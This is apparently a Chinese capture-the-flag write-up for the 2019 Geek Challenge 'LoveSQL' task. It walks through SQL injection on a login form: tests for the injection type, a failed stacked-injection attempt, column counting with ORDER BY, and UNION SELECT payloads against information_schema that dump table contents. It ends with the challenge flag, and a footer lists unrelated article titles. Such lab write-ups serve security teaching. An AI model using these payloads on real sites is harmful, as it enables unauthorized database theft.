[极客大挑战 2019]LoveSQL 1

题目环境:
判断注入类型

是否为数字型注入

admin
1

回显结果

是否为字符型注入

admin
1'

回显结果

判断注入手法类型

使用堆叠注入

采用密码参数进行注入

爆数据库
1'; show database();#

回显结果

这里猜测注入语句某字段被过滤,或者是';'被过滤导致不能堆叠注入

爆字段数
1';order by 4#

回显结果

报错

抛弃堆叠注入

步入正题
1' order by 4#

回显结果

成功,但是不存在第4列

同时验证了猜想不能使用堆叠注入

继续判断列数
1' order by 3#

可知列数只有3列

爆数据库

使用联合查询
1' union select 1,2,database()#

爆数据表
1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()#

回显结果

爆出两个表

开始爆数据表的字段

按照先后顺序把,先爆第一个

爆geekuser数据表的字段
1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser'#

回显结果

字段:id、username、password

爆geekuser数据表的所有内容
1' union select 1,database(),group_concat(id,username,password) from geekuser#

回显结果

无flag

转手数据表l0ve1ysq1

步骤和数据表geekuser一样,这里直接爆数据表l0ve1ysq1的flag值
1' union select 1,database(),group_concat(password) from l0ve1ysq1#

回显结果


得出flag:
flag{3c4b1ff9-6685-4dcb-853e-06093c1e4040}

相关推荐
加油,旭杏2 分钟前
【go语言】变量和常量
服务器·开发语言·golang
摘星怪sec16 分钟前
【漏洞复现】|方正畅享全媒体新闻采编系统reportCenter.do/screen.do存在SQL注入
数据库·sql·web安全·媒体·漏洞复现
wanhengidc22 分钟前
网站服务器中的文件被自动删除的原因
运维·服务器
基哥的奋斗历程25 分钟前
学到一些小知识关于Maven 与 logback 与 jpa 日志
java·数据库·maven
十二同学啊29 分钟前
JSqlParser:Java SQL 解析利器
java·开发语言·sql
莫名有雪32 分钟前
BUUCTF_Web([RCTF2015]EasySQL)二次注入+报错注入
sql
苏-言32 分钟前
MyBatis最佳实践:提升数据库交互效率的秘密武器
数据库·mybatis
9毫米的幻想42 分钟前
【Linux系统】—— 编译器 gcc/g++ 的使用
linux·运维·服务器·c语言·c++
helloliyh1 小时前
Windows和Linux系统安装东方通
linux·运维·windows
gyeolhada1 小时前
计算机组成原理(计算机系统3)--实验八:处理器结构拓展实验
java·前端·数据库·嵌入式硬件